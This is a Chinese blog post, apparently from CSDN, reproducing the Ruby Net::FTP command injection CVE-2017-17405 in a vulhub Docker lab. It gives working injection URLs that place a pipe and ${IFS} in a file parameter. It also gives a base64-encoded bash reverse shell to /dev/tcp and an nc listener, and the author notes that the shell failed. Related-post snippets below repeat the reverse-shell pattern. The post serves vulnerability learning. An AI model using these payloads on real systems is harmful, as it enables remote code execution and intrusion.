Ruby NetFTP 模块命令注入漏洞(CVE-2017-17405)

最新推荐文章于 2024-05-07 11:00:41 发布
最新推荐文章于 2024-05-07 11:00:41 发布
阅读量1k 收藏 3
点赞数 1
分类专栏: 中间件漏洞复现 文章标签: ruby 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/111136088
版权

声明

好好学习,天天向上

漏洞描述

Ruby Net::FTP 模块是一个FTP客户端,在上传和下载文件的过程中,打开本地文件时使用了open函数。而在ruby中,open函数是借用系统命令来打开文件,且没用过滤shell字符,导致在用户控制文件名的情况下,将可以注入任意命令。

影响范围

  • Ruby 2.2系列:2.2.8及更早版本
  • Ruby 2.3系列:2.3.5及更早版本
  • Ruby 2.4系列:2.4.2及更早版本
  • Ruby 2.5系列:2.5.0-preview1
  • 在主干修订版r61242之前

复现过程

这里使用2.2.3版本

使用vulhub

cd /app/vulhub-master/ruby/CVE-2017-17405

使用docker启动

docker-compose build
docker-compose up -d

环境启动后,访问http://your-ip:8080

http://192.168.239.129:8080

开始攻击,kali启动ftp

pip install pyftpdlib
python3 -m pyftpdlib -p 2121 -i 0.0.0.0

在这里插入图片描述

访问如下URL,进行命令执行,空格用${IFS}代替

http://192.168.239.129:8080/download?uri=ftp://192.168.239.139:2121/&file=|touch${IFS}cve-2017-17405.txt

在这里插入图片描述

执行命令

在这里插入图片描述

构造反弹shell

确定要反弹的IP和端口,我是用我的kali

192.168.239.139

6666

那么linux下反弹shell的命令就是

bash -i >& /dev/tcp/192.168.239.139/6666 0>&1

上述命令进行base64编码

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzOS4xMzkvNjY2NiAwPiYx

编码后,与bash拼接

|bash${IFS}-c${IFS}'{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzOS4xMzkvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}'

再与URL进行拼接

http://192.168.239.129:8080/download?uri=ftp://192.168.239.139:2121/&file=|bash${IFS}-c${IFS}'{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzOS4xMzkvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}'

kali监听6666端口

nc -lvvp 6666

浏览器访问

http://192.168.239.129:8080/download?uri=ftp://192.168.239.139:2121/&file=|bash${IFS}-c${IFS}'{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzOS4xMzkvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}'

反弹失败,难受,耻辱下播

关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
专栏目录
漏洞挖掘】——20、RFD漏洞介绍挖掘
Fly_鹏程万里
03-03 2064
RFD(Reflected File Download)即反射型文件下载漏洞,2014年在BlackHat中被提出,该漏洞在原理上类似XSS,在危害上类似DDE,攻击者可以通过一个URL地址使用户下载一个恶意文件,从而危害用户的终端PC,不过这个漏洞很罕见,大多数公司会认为它是一个需要结合社工的低危漏洞,但微软,雅虎,eBay,PayPal和其他许多公司认为这是一个中危漏洞
CVE-2017-17405Ruby Net::FTP 模块命令注入漏洞)复现
kriesa的博客
07-13 1240
CVE-2017-17405复现
CVE-2017-17405漏洞复现
HEAVEN569的博客
02-14 1252
一、漏洞简述 Ruby Net::FTP 模块是一个FTP客户端,在上传和下载文件的过程中,打开本地文件时使用了open函数。而在ruby中,open函数是借用系统命令来打开文件,且没用过滤shell字符,导致在用户控制文件名的情况下,将可以注入任意命令Net::FTP#get、getbinaryfile、gettextfile、put、putbinaryfile和puttextfile使用Kernel#open打开本地文件。如果localfile参数以管道字符“|”开头,则执行管道字符后面的命令
Ruby Net::FTP 模块命令注入漏洞CVE-2017-17405
EC_Carrot的博客
07-26 431
漏洞简介 Net::FTP是其中的一个FTP客户端的实现。 Ruby 2.4.3之前的版本中的Net::FTP存在命令注入漏洞。在上传和下载文件的过程中,打开本地文件时使用了open函数。而在ruby中,open函数是借用系统命令来打开文件,且没用过滤shell字符,导致在用户控制文件名的情况下,将可以注入任意命令漏洞复现 访问http://your-ip:8080/将可以看到一个HTTP服务,其作用是,假如我们访问http://your-ip:8080/download?uri=ftp://examp
【春秋云镜】Ruby Net::FTP 模块命令注入漏洞(CVE-2017-17405)
weixin_44632654的博客
10-17 310
2.4.3之前的Ruby允许Net :: FTP命令注入
春秋云境CVE-2017-17405
最新发布
shr592833253的博客
05-07 318
bash -i >&/dev/tcp/ip/port 0>&1 --> base64 ---> urlencode,最后带入payload对应的位置。复现该漏洞需要我们自己起一个ftp服务,这里推荐用python的pyftpdlib,没有安装的小伙伴,可以现在自己的vps上安装一下。burpsuit重放一下请求包,vps成功反弹出shell,拿到flag!值得注意的是,得关注自己的vps有没有开启2121这个端口。,然后再进行urlencode编码,也就是,随后我们进入靶场,发现如下界面。
Nginx越界读取缓存漏洞 CVE-2017-7529
03-13
Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。... 如果我的请求中包含Range头,Nginx将会根据我指定的start和end位置,返回指定长度的内容。而如果我构造了两个负的位置,如(-600, -...
CVE-2022-33891POC Apache Spark 命令注入CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
2017年,它被发现存在一个严重的安全漏洞,被称为CVE-2017-12149,这是一个反序列化漏洞,允许远程攻击者通过精心构造的输入来执行任意系统命令,从而对受影响的系统造成严重威胁。 反序列化是将已序列化的对象...
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞CVE-2017-7504)是针对企业级Java消息服务(JMS)提供商JBossMQ的一个严重安全问题。该漏洞源于应用程序未能正确处理反序列化的对象,使得攻击者可以通过精心构造的恶意输入触发任意代码...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
Ruby NetFTP模块命令注入(CVE-2017-17405)
m0_65150886的博客
01-16 742
Ruby Net::FTP 模块是一个 FTP 客户端,在上传和下载文件的过程中,打开本地文件时使用了 open 函数。而在 ruby 中,open 函数是借用系统命令来打开文件,且没有过滤 shell 字符,导致在用户控制文件名的情况下,将可以注入任意命令。在Ruby 2.2系列的2.2.8及更早版本、Ruby 2.3系列的2.3.5及更早版本、Ruby 2.4系列的2.4.2及更早版本、Ruby 2.5系列的2.5.0-preview1以及在主干修订版r61242之前都存在该漏洞
热门Ruby 库中存在严重的命令注入漏洞
smellycat000的专栏
04-11 398
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士开发人员修复了用于解析和转换 AsciiDoc 文件的热门 Ruby库中存在一个命令注入漏洞命令注入漏洞可使攻击者在运行应用程序的服务器上执行任意操作系统命令,一般可导致该应用程序及其所有数据遭完全攻陷。这个Ruby 库是 asciidoctor-include-ext,它是Asciidoctor 库的扩展,可将远程 ...
Ruby Net::FTP 模块命令注入漏洞CVE-2017-17405漏洞复现
weixin_51804748的博客
01-17 2079
漏洞简介 Ruby Net::FTP 模块是一个 FTP 客户端,在上传和下载文件的过程中,打开本地文件时使用了 open 函数。而在 ruby 中,open 函数是借用系统命令来打开文件,且没用过滤 shell 字符,导致在用户控制文件名的情况下,将可以注入任意命令。 Vulhub(CVE-2017-17405) 环境搭建 靶机使用vulhub ┌──(root????kali)-[~] └─# cd /root/vulhub/ruby/CVE-2017-17405
[ vulhub漏洞复现篇 ] Apache Log4j Server 反序列化命令执行漏洞 CVE-2017-5645
qq_51577576的博客
09-14 1831
[ vulhub漏洞复现篇 ] Apache Log4j Server 反序列化命令执行漏洞 CVE-2017-5645 Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。
FTP 漏洞利用(CVE-2013-4730 )
weixin_34310785的博客
06-06 3801
免责声明!!!!!!!!!!!本人所提供的源码只是用来学习使用,如果非法使用与作者无关 1。先查看是什么漏洞2。写一个测试代码 #include"stdafx.h" #include<winsock2.h> #pragma comment(lib,"Ws2_32.lib") int _tmain(int argc, TCHAR* argv[]) { //1.初始化一个sock...
Ruby ERB注入&&反序列化
qq_53142368的博客
06-07 956
Ruby ERB注入 现在的Web应用中,许多客户端以及服务器端经常会用到模板。许多模板引擎提供了多种不同的编程语言实现,比如Smarty、Mako、Jinja2、Jade、Velocity、Freemaker以及Twig等模板。作为注入攻击大家族中的一员,模板注入这种攻击形式对不同的目标所造成的影响也有所不同。对于AngularJS而言,模板注入攻击可以达到XSS攻击效果,对于服务器端的注入攻击而言,模板注入攻击可以达到远程代码执行效果。 ERB时Ruby自带的 <% 写逻辑脚本(Ruby语法) %
FTP服务器版本信息可被获取(CVE-1999-0614)(建议修改源代码或者配置文件改变缺省banner信息。)
讓之的博客
10-12 4562
漏洞扫描报告 1、测试查看,默认端口21 telnet 127.0.0.1 21 下图所示即为漏洞信息描述的 可获取版本号 2、修改 vsftpd.conf 配置文件(/etc/vsftpd/vsftpd.conf) 找到 ftpd_banner 位置,默认103行左右,修改为如下 You may fully customise the login banner string: ftpd_banner=this is vsftpd 如果没有安装vsftpd,先执行安装vsftpd #更新软
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值